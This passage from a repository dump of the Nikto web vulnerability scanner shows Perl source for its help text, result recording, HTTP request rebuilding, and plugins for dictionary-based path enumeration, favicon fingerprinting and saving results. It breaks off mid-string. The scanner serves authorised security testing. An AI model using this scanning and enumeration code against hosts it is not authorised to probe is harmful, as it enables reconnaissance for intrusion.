$NIKTO{'anti_ids'} }) {\n        print \"                               $k     $NIKTO{'anti_ids'}{$k}\\n\";\n    }\n\n    print \"        -followredirects   Follow 3xx redirects to new location\n        -Format+           Save file (-o) format:\n                               csv   Comma-separated-value\n                               json  JSON Format\n                               htm   HTML Format\n                               sql   Generic SQL (see docs for schema)\n                               txt   Plain text\n                               xml   XML Format\n                               (if not specified the format will be taken from the file extension passed to -output)\n       -Help              This help information\n       -host+             Target host/URL\n       -id+               Host authentication to use, format is id:pass or id:pass:realm\n       -ipv4                 IPv4 Only\n       -ipv6                 IPv6 Only\n       -key+              Client certificate key file\n       -list-plugins      List all available plugins, perform no testing\n       -maxtime+          Maximum testing time per host (e.g., 1h, 60m, 3600s)\n       -mutate+           Guess additional file names:\\n\";\n\n    foreach my $k (sort keys %{ $NIKTO{'mutate_opts'} }) {\n        print \"                               $k     $NIKTO{'mutate_opts'}{$k}\\n\";\n    }\n\n    print \"       -mutate-options    Provide information for mutates\n       -nocheck           Don't check for updates on startup\n       -nocookies         Do not use cookies from responses in requests\n       -nointeractive     Disables interactive features\n       -nolookup          Disables DNS lookups\n       -nossl             Disables the use of SSL\n       -noslash           Strip trailing slash from URL (e.g., '/admin/' to '/admin')\n       -no404             Disables nikto attempting to guess a 404 page\n       -Option            Over-ride an option in nikto.conf, can be issued multiple times\n       -output+           Write output to this file ('.' for auto-name)\n       -Pause+            Pause between tests (seconds)\n       -Platform+         Platform of target (nix, win, all)\n       -Plugins+          List of plugins to run (default: ALL)\n       -port+             Port to use (default 80)\n       -RSAcert+          Client certificate file\n       -root+             Prepend root value to all requests, format is /directory\n       -Save              Save positive responses to this directory ('.' for auto-name)\n       -ssl               Force ssl mode on port\n       -Tuning+           Scan tuning:\n                               1     Interesting File / Seen in logs\n                               2     Misconfiguration / Default File\n                               3     Information Disclosure\n                               4     Injection (XSS/Script/HTML)\n                               5     Remote File Retrieval - Inside Web Root\n                               6     Denial of Service\n                               7     Remote File Retrieval - Server Wide\n                               8     Command Execution / Remote Shell\n                               9     SQL Injection\n                               0     File Upload\n                               a     Authentication Bypass\n                               b     Software Identification\n                               c     Remote Source Inclusion\n                               d     WebService\n                               e     Administrative Console\n                               x     Reverse Tuning Options (i.e., include all except specified)\n       -timeout+          Timeout for requests (default 10 seconds)\n       -Userdbs           Load only user databases, not the standard databases\n                               all   Disable standard dbs and load only user dbs\n                               tests Disable only db_tests and load udb_tests\n       -useragent         Force User-Agent instead of pulling from database\n       -url+              Target host/URL (alias of -host)\n       -useproxy          Use the proxy defined in nikto.conf, or argument http://server:port\n       -Version           Print plugin and database versions\n       -vhost+            Virtual host (for Host header)\n       -404code           Ignore these HTTP codes as negative responses (always). Format is \\\"302,301\\\".\n       -404string         Ignore this string in response body content as negative response (always). Can be a regular expression.\n   \t\t+ requires a value\\n\\n\";\n\n    exit 0;\n}\n\n#######################################################################\nsub init_db {\n    my $dbname = shift;\n    return if $dbname eq \"\";\n    my $filename = \"$CONFIGFILE{'DBDIR'}/\" . $dbname;\n    my (@dbarray, @headers);\n    my $hashref = {};\n\n    if ($CLI{'userdbs'} ne 'all') {\n\n        # Check that the database exists\n        unless (open(IN, \"<$filename\")) {\n            nprint(\"+ ERROR: Unable to open database file $dbname: $@.\");\n            return $dbarray;\n        }\n\n        # Now read the header values\n        while (<IN>) {\n            chomp;\n            s/\\#.*$//;\n            if     ($_ eq \"\") { next }\n            unless (@headers) {\n                @headers = parse_csv($_);\n            }\n            else {\n\n                # contents; so split them up and apply to hash\n                my @contents = parse_csv($_);\n                my $hashref  = {};\n                for (my $i = 0 ; $i <= $#contents ; $i++) {\n                    $hashref->{ $headers[$i] } = $contents[$i];\n                }\n                push(@dbarray, $hashref);\n            }\n        }\n        close(IN);\n    }\n\n    # And the udb_* file\n    $filename = \"$CONFIGFILE{'DBDIR'}/u\" . $dbname;\n    if (open(IN, \"<$filename\")) {\n        while (<IN>) {\n            chomp;\n            s/\\#.*$//;\n            if ($_ eq \"\") { next; }\n\n            # contents; so split them up and apply to hash\n            my @contents = parse_csv($_);\n            my $hashref  = {};\n            for (my $i = 0 ; $i <= $#contents ; $i++) {\n                $hashref->{ $headers[$i] } = $contents[$i];\n            }\n            push(@dbarray, $hashref);\n        }\n    }\n    close(IN);\n\n    return \\@dbarray;\n}\n\n#######################################################################\nsub add_vulnerability {\n    my ($mark, $message, $nikto_id, $refs, $method, $uri, $request, $response, $reason) = @_;\n\n    # Also normalize the response URI so it's consistent when used later\n    if (defined $response && defined $response->{whisker}) {\n        if (   !defined $response->{whisker}->{uri_requested}\n            || $response->{whisker}->{uri_requested} eq \"\"\n            || $response->{whisker}->{uri_requested} eq \".\") {\n            $response->{whisker}->{uri_requested} = \"/\";\n        }\n    }\n    $method = \"GET\" unless (defined $method);\n\n    # Grammar matters\n    if ($message !~ /\\.$/) {\n        $message .= \".\";\n    }\n\n    # check to see if we've alerted already (can be from content search, etc.)\n    foreach my $r (@RESULTS) {\n        if (   ($uri eq $r->{'uri'})\n            && ($message eq $r->{'message'})\n            && ($method eq $r->{'method'})\n            && (${ $r->{'mark'} }{'ident'} eq $mark->{'ident'})\n            && (${ $r->{'mark'} }{'port'} eq $mark->{'port'})) {\n            return;\n        }\n    }\n\n    my $result = \"\";\n    if (defined $_[7]) {\n        $result = $_[7]->{'whisker'}->{'data'};\n    }\n\n    my $resulthash;\n    %$resulthash = (mark     => $mark,\n                    message  => $message,\n                    nikto_id => $nikto_id,\n                    refs     => $refs,\n                    method   => $method,\n                    uri      => $response->{whisker}->{uri_requested} || '/',\n                    result   => $result,\n                    request  => $request,\n                    response => $response,\n                    reason   => $reason,\n                    );\n\n    push(@RESULTS, $resulthash);\n    $mark->{total_vulns}++;\n\n    if ($refs ne \"\") {\n        $message .= \" See: $refs\";\n    }\n\n    nprint(\"+ [$nikto_id] $message\",\n           \"\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n\n    # Save it\n    if ($CLI{'saveresults'} ne '') {\n        save_item($resulthash, $message, $request, $response);\n    }\n\n    # Now report it\n    report_item($mark, $resulthash);\n}\n\n###############################################################################\nsub rebuild_request {\n    my ($req, $include_body, $truncate_length) = @_;\n    return '' unless ref($req) eq 'HASH';\n\n    # Default to including body for backward compatibility\n    $include_body = 1 unless defined $include_body;\n\n    my $w = (ref($req->{whisker}) eq 'HASH') ? $req->{whisker} : {};\n\n    my $method = $w->{method} || 'GET';\n    my $uri    = defined $w->{uri} ? $w->{uri} : '/';\n    my $proto  = $w->{protocol} || 'HTTP';\n    my $ver    = $w->{version}  || '1.1';\n\n    my $eol = (defined $w->{http_eol} && $w->{http_eol} ne '') ? $w->{http_eol} : \"\\r\\n\";\n\n    # Things that are NOT HTTP headers in LW2 request structure\n    my %NOT_HEADERS = map { $_ => 1 } qw(\n      whisker data MAGIC host port ssl max_size\n      method uri protocol version timeout\n      http_eol http_space1 http_space2 retry\n      uri_param_sep uri_prefix uri_postfix include_host_in_uri\n      force_bodysnatch force_open force_close trailing_slurp\n      ignore_duplicate_headers lowercase_incoming_headers normalize_incoming_headers\n      require_newline_after_headers invalid_protocol_return_value\n      ssl_certfile ssl_rsacertfile ssl_save_info\n      );\n\n    # Allowlist pattern for header names\n    my $is_header_name = sub {\n        my ($k) = @_;\n        return 0 if !defined $k;\n        return 0 if $NOT_HEADERS{$k};    # hard stop\n        return ($k =~ /^[A-Za-z][A-Za-z0-9-]*$/) ? 1 : 0;\n    };\n\n    # Merge headers: whisker first, then top-level overrides\n    my %h;\n\n    for my $k (keys %$w) {\n        next unless $is_header_name->($k);\n        next unless defined $w->{$k};\n        next if ref($w->{$k});\n        $h{$k} = $w->{$k};\n    }\n\n    for my $k (keys %$req) {\n        next unless $is_header_name->($k);\n        next unless defined $req->{$k};\n        next if ref($req->{$k});\n        $h{$k} = $req->{$k};\n    }\n\n    # Determine Host header value (prefer explicit Host; else whisker 'host')\n    my $host_val = '';\n    if (exists $h{Host} && defined $h{Host}) {\n        $host_val = $h{Host};\n    }\n    elsif (defined $w->{host} && $w->{host} ne '') {\n        $host_val = $w->{host};\n    }\n\n    # Build request line\n    my $out = \"$method $uri $proto/$ver$eol\";\n\n    # Host header must be immediately after request line\n    if ($host_val ne '') {\n        $host_val =~ s/\\r|\\n/ /g;\n        $out .= \"Host: $host_val$eol\";\n        delete $h{Host};    # avoid duplicate\n    }\n\n    # Other headers: stable order (case-insensitive)\n    my @keys = sort { lc($a) cmp lc($b) } keys %h;\n\n    for my $k (@keys) {\n        my $v = $h{$k};\n        next unless defined $v;\n        $v =~ s/\\r|\\n/ /g;\n        $out .= \"$k: $v$eol\";\n    }\n\n    $out .= $eol;\n\n    # Include body if flag is set\n    if ($include_body && defined $w->{data} && length($w->{data})) {\n        $out .= $w->{data};\n    }\n\n    # Truncate if length specified\n    if (defined $truncate_length && $truncate_length > 0 && length($out) > $truncate_length) {\n        my $original_length = length($out);\n        $out = substr($out, 0, $truncate_length);\n        $out .= \"\\n[Request truncated - original size: $original_length bytes]\";\n    }\n\n    return $out;\n}\n\n###############################################################################\nsub rebuild_response {\n    my ($resp, $include_body, $truncate_length) = @_;\n    return '' unless ref($resp) eq 'HASH';\n\n    # Default to including body for backward compatibility\n    $include_body = 1 unless defined $include_body;\n\n    my $w = (ref($resp->{whisker}) eq 'HASH') ? $resp->{whisker} : {};\n\n    my $proto = $w->{protocol} || 'HTTP';\n    my $ver   = $w->{version}  || '1.1';\n    my $code  = defined $w->{code}    ? $w->{code}    : '200';\n    my $msg   = defined $w->{message} ? $w->{message} : 'OK';\n\n    my $eol = (defined $w->{http_eol} && $w->{http_eol} ne '') ? $w->{http_eol} : \"\\r\\n\";\n\n    # Build status line\n    my $out = \"$proto/$ver $code $msg$eol\";\n\n    # Use header_order from whisker hash to maintain original header order\n    if (defined $w->{header_order} && ref($w->{header_order}) eq 'ARRAY') {\n        my %header_output;    # Track which header values we've already output\n        foreach my $header_name (@{ $w->{header_order} }) {\n            next if ($header_name eq '' || $header_name eq 'whisker');\n            next unless defined $resp->{$header_name};\n\n            # Handle multiple values for the same header (array reference)\n            if (ref($resp->{$header_name}) eq 'ARRAY') {\n                my $value_idx = $header_output{$header_name} || 0;\n\n                # Output one value per header_order entry to maintain order\n                if ($value_idx < @{ $resp->{$header_name} }) {\n                    my $value = $resp->{$header_name}->[$value_idx];\n                    if (defined $value) {\n                        $value =~ s/\\r|\\n/ /g;\n                        $out .= \"$header_name: $value$eol\";\n                        $header_output{$header_name} = $value_idx + 1;\n                    }\n                }\n            }\n            else {\n                # Single value header - only output once even if in header_order multiple times\n                unless ($header_output{$header_name}) {\n                    my $value = $resp->{$header_name};\n                    $value =~ s/\\r|\\n/ /g;\n                    $out .= \"$header_name: $value$eol\";\n                    $header_output{$header_name} = 1;\n                }\n            }\n        }\n    }\n\n    $out .= $eol;\n\n    # Include body if flag is set\n    if ($include_body && defined $w->{data} && length($w->{data})) {\n        $out .= $w->{data};\n    }\n\n    # Truncate if length specified\n    if (defined $truncate_length && $truncate_length > 0 && length($out) > $truncate_length) {\n        my $original_length = length($out);\n        $out = substr($out, 0, $truncate_length);\n        $out .= \"\\n[Response truncated - original size: $original_length bytes]\";\n    }\n\n    return $out;\n}\n\n###############################################################################\nsub list_plugins {\n\n    # Just do a load_plugins, then loop through the array and print out name,\n    # description and copyright\n\n    load_plugins();\n\n    foreach my $plugin (@PLUGINS) {\n        nprint(\"Plugin: $plugin->{'name'}\");\n        nprint(\" $plugin->{'full_name'} - $plugin->{'description'}\");\n        nprint(\" Written by $plugin->{'author'}, Copyright (C) $plugin->{'copyright'}\");\n        if (defined $plugin->{'options'}) {\n            nprint(\" Options:\");\n            while (my ($option, $description) = each(%{ $plugin->{'options'} })) {\n                nprint(\"  $option: $description\");\n            }\n        }\n        nprint(\"\\n\");\n    }\n\n    # Plugin macros\n    nprint(\"Defined plugin macros:\");\n\n    foreach my $macro (keys %CONFIGFILE) {\n        if ($macro =~ /^@@/) {\n            nprint(\" $macro = \\\"\" . $CONFIGFILE{$macro} . \"\\\"\");\n            if ($CONFIGFILE{$macro} =~ /@@/) {\n                nprint(\"  (expanded) = \\\"\" . expand_pluginlist($CONFIGFILE{$macro}, 0) . \"\\\"\");\n            }\n        }\n    }\n\n    exit 0;\n}\n\n###############################################################################\n# This is overly complicated and jumps a lot between scalars and arrays. The REs are\n# probably dodgy, but it works! W00!\nsub expand_pluginlist {\n    my ($pluginlist, $parent) = @_;\n\n    my @macros;\n    foreach my $config (keys %CONFIGFILE) {\n        if ($config =~ /^@@/) {\n            push(@macros, $config);\n        }\n    }\n\n    # Now loop through each member of the list and expand it\n    my $count       = 0;\n    my $npluginlist = $pluginlist;\n    do {\n        $count++;\n        my @raw = split(/;/, $npluginlist);\n\n        # cooked contains the processed list\n        my @cooked;\n        foreach my $entry (@raw) {\n\n            # Is it +; if so remap to @@DEFAULT\n            if ($entry eq \"+\") {\n                $entry = '@@DEFAULT';\n            }\n\n            # result contains the processed entry\n            my $result = $original = $entry;\n\n            # Is it a macro\n            if ($entry =~ /^-?@@/) {\n\n                # break up into components\n                $prefix = ($entry =~ /^-/) ? \"-\" : \"\";\n                $name   = $suffix = $entry;\n                $name   =~ s/(^-?)(@@[[:alpha:]]+)(\\(?.*\\)?$)/$2/;\n                $suffix =~ s/(.*)(\\(.*\\))/$2/;\n                if ($suffix eq $entry) {\n                    $suffix = \"\";\n                }\n                foreach my $macro (@macros) {\n                    if ($entry =~ /-?$macro/) {\n\n                        # It's a macro, so replace the contents with the macro\n                        # Add prefix and suffix to each member of the macro\n                        my @temp;\n                        foreach my $child (split(/;/, $CONFIGFILE{$macro})) {\n                            push(@temp, \"$prefix$child$suffix\");\n                        }\n                        $result = join(';', @temp);\n\n                        # stop an infinite loop\n                        last;\n                    }\n                }\n            }\n            if ($result =~ /^-?@@/ && $result eq $original) {\n\n                # macro not found or is itself - ignore\n                $result = \"\";\n            }\n            if ($count > 100) {\n\n                # check for recurstion\n                nprint(\"ERROR: Recursion found whilst expanding macros\");\n                $result = \"\";\n                last;\n            }\n            push(@cooked, $result);\n        }\n        $npluginlist = join(';', @cooked);\n    } while ($npluginlist =~ /@@/ && $count <= 100);\n\n    #use re 'debug';\n    # Now we've expanded out macros, deal with duplicates and -\n    my @raw = split(/;/, $npluginlist);\n\n    # hash so we don't have to mess with duplicates\n    my %cooked;\n    foreach my $plugin (@raw) {\n\n        # break out components\n        my $minus;\n        my $name = my $suffix = $plugin;\n        $minus = (substr($plugin, 0, 1) eq '-');\n        $name   =~ s/(^-?)([^\\(]+)(\\(?.*\\)?$)/$2/;\n        $suffix =~ s/(.*)(\\(.*\\))/$2/;\n        if ($suffix eq $plugin) {\n            $suffix = \"\";\n        }\n\n        if ($minus) {\n\n            # it's a minus - remove any previous entry\n            if (exists $cooked{$name}) {\n                delete $cooked{$name};\n            }\n        }\n        else {\n\n            # else add it with the parameters as the value of the hash\n            $cooked{$name} = $suffix;\n        }\n    }\n\n    # Now rejoin into one happy whole\n    my $output;\n    foreach my $plugin (keys %cooked) {\n        $output .= \"$plugin\" . $cooked{$plugin} . \";\";\n    }\n\n    # remove the last ;\n    $output =~ s/;$//g;\n\n    return $output;\n}\n###############################################################################\n# Check a regex for validation & fix. If mode=1, return a flag which indicates\n# whether the regex was changed\nsub validate_and_fix_regex {\n    my ($regex, $mode) = @_;\n    my $fixed = 0;\n    eval { qr/$regex/ };\n    if ($@) {\n        $fixed = 1;\n        $regex = rquote($regex);\n    }\n    return $mode ? ($regex, $fixed) : $regex;\n}\n###############################################################################\n# Process captured groups in message strings\n# Replaces $1, $2, etc. with captured group values\nsub process_captured_groups {\n    my ($message, $captures) = @_;\n\n    # Quick exit if no message or captures\n    return $message unless $message && $captures && @$captures;\n\n    # Quick exit if message has no placeholder patterns\n    return $message unless $message =~ /\\$\\d+/;\n\n    # Replace $1, $2, etc. with captured values\n    for my $i (1 .. @$captures) {\n        my $value = $captures->[ $i - 1 ];\n\n        # Replace with captured value or empty string if undefined\n        $value = '' unless defined $value;\n        $message =~ s/\\$$i(?!\\d)/$value/g;\n    }\n\n    return $message;\n}\n###############################################################################\nsub rquote {\n    my $string = $_[0] || return;\n    $string =~ s/([^A-Za-z_0-9 \"'\\\\])/\\\\$1/g;\n    return $string;\n}\n###############################################################################\nsub gmt_offset {\n    my @t = localtime(time);\n    return (timegm(@t) - timelocal(@t)) / 3600;\n}\n###############################################################################\nsub expand_range {\n    local $\" = '..';\n    my (@range);\n\n    sort { $a <=> $b }\n      map {\n        map { ((@range = split /-/) == 2) ? eval('map {$_} ' . \"@range\") : $_ }\n          split /\\s/\n      } @_;\n}\n###############################################################################\nsub check_ipv6 {\n    nprint(\"Performing IPv6 connectivity tests:\");\n\n    # Perform a series of tests and: exit 1 or 0\n\n    # Does the version of Socket even support IPv6?\n    if (!$LW2::LW2_CAN_IPv6) {\n        nprint(\n            \"+ ERROR: This version of Socket ($Socket::VERSION) has insufficient (or no) IPv6 support\"\n            );\n        exit 1;\n    }\n    nprint(\"+ This version of Socket ($Socket::VERSION) does support IPv6\");\n\n    # Ensure switches are in a known state\n    $CLI{'ipv6'} = 1;\n    $CLI{'ipv4'} = 0;\n\n    if ($CONFIGFILE{'CHECK6HOST'} eq \"\") {\n        $CONFIGFILE{'CHECK6HOST'} = 'ipv6.google.com';\n        $CONFIGFILE{'CHECK6PORT'} = '443';\n    }\n\n    # Try to resolve a known IPv6 hostname\n    my ($name, $ip, $displayname) = resolve($CONFIGFILE{'CHECK6HOST'});\n    if (!$ip) {\n        nprint(\"- DNS resolution of '$CONFIGFILE{'CHECK6HOST'}' using AF_INET6 failed\");\n        nprint(\n            \"\\t(Perhaps no DNS server set or server is incapable of resolving an IPv6 address for $CONFIGFILE{'CHECK6HOST'})\"\n            );\n        exit 1;\n    }\n    nprint(\"+ Successful DNS resolution of '$CONFIGFILE{'CHECK6HOST'}': $ip\");\n\n    # Try to connect to the host\n    my $res = LW2::utils_port_open($CONFIGFILE{'CHECK6HOST'}, $CONFIGFILE{'CHECK6PORT'});\n    if (!$res) {\n        nprint(\n            \"+ ERROR: TCP connection to '$CONFIGFILE{'CHECK6HOST'}:$CONFIGFILE{'CHECK6PORT'}' using AF_INET6 failed\"\n            );\n        nprint(\"\\t(Likely either no IPv6 connectivity or firewall blocking)\");\n        exit 1;\n    }\n    nprint(\"+ Successful TCP connection to '$CONFIGFILE{'CHECK6HOST'}:$CONFIGFILE{'CHECK6PORT'}'\");\n    nprint(\"----> All tests successful\");\n    exit 0;\n}\n###############################################################################\nsub nikto_core { return; }    # trap for this plugin being called to run. lame.\n###############################################################################\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_dictionary_attack.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Run dictionary tests\n###############################################################################\nsub nikto_dictionary_attack_init {\n    my $id = { name        => \"dictionary\",\n               full_name   => \"Dictionary attack\",\n               author      => \"Tautology\",\n               description => \"Attempts to dictionary attack commonly known directories/files\",\n               hooks       => {\n                          recon => { method => \\&nikto_dictionary_attack,\n                                     weight => 20,\n                                     },\n                            },\n               options => { dictionary => \"Dictionary of paths to look for.\",\n                            method     => \"Method to use to enumerate.\",\n                            },\n               copyright => \"2009 Chris Sullo\"\n               };\n\n    return $id;\n}\n\nsub nikto_dictionary_attack {\n    my ($mark, $parameters) = @_;\n    return if $mark->{'terminate'};\n\n    my $method = \"HEAD\";\n\n    my $dictfile = \"\";\n    if (   defined $parameters\n        && defined $parameters->{'dictionary'}) {\n        $dictfile = $parameters->{'dictionary'};\n    }\n    elsif (defined($CLI{'mutate-options'})) {\n        $dictfile = $CLI{'mutate-options'};\n    }\n    else {\n        nprint(\"- No dictionary file given in plugin options, skipping check\", \"v\", \"dictionary\");\n        return;\n    }\n\n    if (   defined $parameters\n        && defined $parameters->{'method'}) {\n        $method = $parameters->{'method'};\n    }\n    my $ctr = 0;\n\n    if (!defined $dictfile) {\n        nprint(\"- No dictionary file given in mutate-options, skipping check.\");\n        return;\n    }\n\n    # Record the host for future use\n    my $host = $mark->{'hostname'};\n\n    nprint(\"- Guessing directories/files (using dictionary $dictfile).\", \"v\", \"dictionary\");\n    unless (open(IN, \"<$dictfile\")) {\n        nprint(\"+ ERROR: Unable to open dictionary file $dictfile: $!.\");\n    }\n\n    # Now attempt on each entry\n    while (<IN>) {\n        return if $mark->{'terminate'};\n        chomp;\n        s/\\#.*$//;\n        next if ($_ eq \"\");\n        my $dir = $_;\n        if (($ctr % 100) == 0) {\n            nprint(\"- File enumeration guess $ctr ($dir): /$dir/\", \"v\", \"dictionary\");\n        }\n        my ($code, $content, $error, $request, $response) =\n          nfetch($mark, \"/$dir\", \"${method}\", \"\", \"\", \"\", \"dictionary_attack\");\n        foreach my $found (split(/ /, $VARIABLES{\"\\@HTTPFOUND\"})) {\n\n            if ($code eq $found) {\n                add_vulnerability($mark, \"/$dir: Found a file\",\n                                  999969, \"\", \"HEAD\", \"/$dir\", $request, $response);\n            }\n        }\n        $ctr++;\n    }\n    close(IN);\n}    # End sub\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_favicon.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Get a favicon file & MD5 fingerprint\n###############################################################################\nuse vars qw/$FAVICONDB %LINKICONS/;\n\nsub nikto_favicon_init {\n    my $id = { name        => \"favicon\",\n               full_name   => \"Favicon\",\n               author      => \"Sullo\",\n               description => \"Checks the web server's favicon against known favicons.\",\n               copyright   => \"2008 Chris Sullo\",\n               hooks       => {\n                          scan  => { method => \\&nikto_favicon, },\n                          start => { method => \\&nikto_favicon_load, }\n                          },\n                 };\n    return $id;\n}\n\nsub nikto_favicon_load {\n    $FAVICONDB = init_db(\"db_favicon\");\n}\n\nsub nikto_favicon {\n    my ($mark) = @_;\n    return if $mark->{'terminate'};\n\n    # Check /favicon.ico\n    foreach my $ext (split(/,/, \"ico,gif,png\")) {\n        foreach my $path (split /,/, \",/favicons\") {\n            my ($res, $content, $error, $request, $response) =\n              nfetch($mark, \"$path/favicon.$ext\", \"GET\", \"\", \"\", \"\", \"favicon\");\n\n            if (($res eq \"200\") && ($content ne \"\")) {\n                my $hash = LW2::md5($content);\n                $hash =~ s/^.*://;\n                nprint(\"Got $path/favicon.$ext hash:$hash\", \"d\");\n                favicon_matchhash($mark, $hash, $mark->{'root'} . \"$path/favicon.$ext\",\n                                  $request, $response);\n            }\n        }\n    }\n\n    # Check for a <link> favicon\n    ($res, $content, $error, $request, $response) =\n      nfetch($mark, \"/\", \"GET\", \"\", \"\", \"\", \"favicon\");\n    if ($content =~ /link\\s[^<]+icon+[^>]+\\.(ico|png|gif)/i) {\n        my %tags;\n        $tags{'link'} = 1;\n        LW2::html_find_tags(\\$content, \\&favicon_checkhash, '', '', \\%tags);\n        foreach my $icon (keys %LINKICONS) {\n            ($res, $content, $error, $request, $response) =\n              nfetch($mark, $icon, \"GET\", \"\", \"\", \"\", \"favicon\");\n            if (($res eq \"200\") && ($content ne \"\")) {\n                my $hash = LW2::md5($content);\n                $hash =~ s/^.*://;\n                nprint(\"Got $icon hash:$hash\", \"d\");\n                favicon_matchhash($mark, $hash, $icon, $request, $response);\n            }\n        }\n    }\n}\n\nsub favicon_checkhash {\n    my ($tag, $elements) = @_;\n    while ((my ($e, $v)) = each(%{$elements})) {\n        if ($e ne 'href') { next; }\n        if ($v =~ /\\.(ico|png|gif)$/) {\n            my @url = LW2::uri_split($v);\n            $LINKICONS{ $url[0] } = 1;\n        }\n    }\n    return;\n}\n\nsub favicon_matchhash {\n    my ($mark, $hash, $icon, $request, $response) = @_;\n    return if (($hash eq \"\") || ($icon eq \"\"));\n    foreach my $item (@$FAVICONDB) {\n        if ($item->{'md5hash'} eq $hash) {\n            add_vulnerability($mark,\n                              \"$icon: identifies this app/server as: $item->{'description'}\",\n                              $item->{'nikto_id'},\n                              \"https://en.wikipedia.org/wiki/Favicon\",\n                              \"GET\",\n                              $icon,\n                              $request,\n                              $response\n                              );\n        }\n    }\n}\n1;\n"
  },
  {
    "path": "program/plugins/nikto_fileops.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Various file operations\n###############################################################################\nsub nikto_fileops_init {\n    my $id = { name        => \"fileops\",\n               full_name   => \"File Operations\",\n               author      => \"Sullo\",\n               description => \"Saves results to a text file.\",\n               copyright   => \"2012 Chris Sullo\",\n               };\n    return $id;\n}\n\n###############################################################################\n# save a result to text file\nsub save_item {\n    require JSON::PP;\n    my ($resulthash, $message, $request, $response) = @_;\n    return if $resulthash->{'mark'}->{'save_prefix'} eq '';\n    my $fn =\n        $resulthash->{'mark'}->{'save_dir'} . \"/\"\n      . $resulthash->{'mark'}->{'save_prefix'}\n      . $resulthash->{'nikto_id'} . \".txt\";\n    my $json_request    = JSON::PP->new->utf8(1)->allow_nonref(1)->encode($request);\n    my $json_response   = JSON::PP->new->utf8(1)->allow_nonref(1)->encode($response);\n    my $cookies_written = 0;\n\n    open(SAVEFILE, \">>$fn\") || die print \"ERROR opening savefile '$fn': $@\\n\";\n    print SAVEFILE $VARIABLES{'DIV'} . \"\\n\";\n    print SAVEFILE \"\t\t\t  Information\\n\";\n    print SAVEFILE $VARIABLES{'DIV'} . \"\\n\";\n    print SAVEFILE \"Test ID:  \\t\" . $resulthash->{'nikto_id'} . \"\\n\";\n    print SAVEFILE \"References: \\t\" . $resulthash->{'refs'} . \"\\n\";\n    print SAVEFILE \"Message:  \\t\" . $message . \"\\n\";\n    print SAVEFILE \"Reason:   \\t\" . $resulthash->{'reason'} . \"\\n\";\n    print SAVEFILE $VARIABLES{'DIV'} . \"\\n\";\n    print SAVEFILE \"\t\t\t  Request\\n\";\n    print SAVEFILE $VARIABLES{'DIV'} . \"\\n\";\n\n    if ($request->{'whisker'}{'method'} eq '') {\n        print SAVEFILE \"Not Applicable\\n\";\n    }\n    else {\n        my $request_string = rebuild_request($request);\n        print SAVEFILE $request_string;\n    }\n    print SAVEFILE \"\\n\";\n    print SAVEFILE $VARIABLES{'DIV'} . \"\\n\";\n    print SAVEFILE \"\t\t\t  Response\\n\";\n    print SAVEFILE $VARIABLES{'DIV'} . \"\\n\";\n    if ($response->{'whisker'}{'protocol'} eq '') {\n        print SAVEFILE \"Not Applicable\\n\";\n    }\n    else {\n        print SAVEFILE rebuild_response($response);\n    }\n\n    print SAVEFILE $VARIABLES{'DIV'} . \"\\n\";\n    print SAVEFILE \"\t\t\t  Data Objects\\n\";\n    print SAVEFILE $VARIABLES{'DIV'} . \"\\n\";\n    if ($request->{'whisker'}{'method'} ne '') {\n        print SAVEFILE \"REQUEST:$json_request\\n\";\n    }\n    if ($response->{'whisker'}{'protocol'} ne '') {\n        print SAVEFILE \"RESPONSE:$json_response\\n\";\n    }\n    close(SAVEFILE);\n}\n\n###############################################################################\n# get the prefix for all current host's save files\nsub save_getprefix {\n    my ($mark) = @_;\n    my $prefix = $mark->{'display_name'} . '_' . $mark->{'port'};\n    $prefix =~ s/,/\\-/g;\n    $prefix =~ s/[^a-zA-Z0-9\\.\\-\\_]/_/g;\n    $prefix =~ s/_+/_/g;\n    my $now = date_disp(time());\n    $now =~ s/\\s.*$//;\n    $prefix .= \"_\" . $now . \"_\";\n    return $prefix;\n}\n\n###############################################################################\n# Define/create the save directory\nsub save_createdir {\n    my ($savedir, $mark) = @_;\n    if ($savedir eq '.') {\n        $savedir = 'savedir_' . $mark->{'display_name'} . '_' . $mark->{'port'};\n        $savedir =~ s/,/\\-/g;\n        $savedir =~ s/[^a-zA-Z0-9\\.\\-\\_]/_/g;\n        $savedir =~ s/_+/_/g;\n        my $now = date_disp(time());\n        $now =~ s/[^0-9-]/-/g;\n        $savedir .= \"_\" . $now;\n    }\n    elsif (-f $savedir) {\n        nprint(\"+ ERROR: Directory from -Savedir is a file.\");\n        exit 1;\n    }\n\n    # create?\n    if (!-d $savedir) {\n        mkdir($savedir);\n        if (!-d $savedir) {\n            nprint(\"+ ERROR: Unable to create -Save directory '$savedir'\",\n                   \"\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n            exit 1;\n        }\n    }\n    return $savedir;\n}\n\n###############################################################################\n# Parse input host files\nsub parse_hostfile {\n    my ($file) = @_;\n    my (@results, $hostdesc);\n    my $nmap = 0;\n\n    open(IN, $file) || die print STDERR \"+ ERROR: Cannot open '$file':$@\\n\";\n    while (<IN>) {\n        my $found = 0;\n\n        # Check whether this is a greppable nmap file\n        chomp;\n        $nmap = 1 if (/^# Nmap/);\n        s/\\#.*$//;\n        if ($_ eq \"\") { next; }\n\n        # Parse for nmap files\n        if ($nmap) {\n            if (($_ !~ /Host/) || ($_ !~ /Ports/) || ($_ !~ /open/) || ($_ !~ /(?:http|ssl)/i)) {\n                next;\n            }\n\n            # parse out the line\n            my @fields = split(\"\\t\", $_);\n\n            # Get the host name\n            $fields[0] =~ /Host:\\s+($LW2::IPv4_re|$LW2::IPv6_re_inc_zoneid)\\s+\\(([^\\)]+)?\\)/;\n            $hostdesc = ($2 ne \"\") ? $2 : $1;\n\n            # Parse the ports list from:\n            # Host: 1.0.0.0 ()  Ports: 80/open/tcp//http///, 8000/open/tcp//http-alt///\n            $fields[1] =~ s/^Ports: //;\n            my @ports = parse_csv($fields[1]);\n            foreach my $nmp (@ports) {\n                if (($nmp !~ /(?:80|443)?\\/open\\/tcp/) || ($nmp !~ /(?:http|ssl)/i)) {\n                    nprint(\"\\tNon web port identified: $hostdesc:$nmp\", \"d\", ($hostdesc));\n                    next;\n                }\n                $nmp =~ /^(?:\\s+)?(\\d+)\\//;\n                nprint(\"+ nmap Input 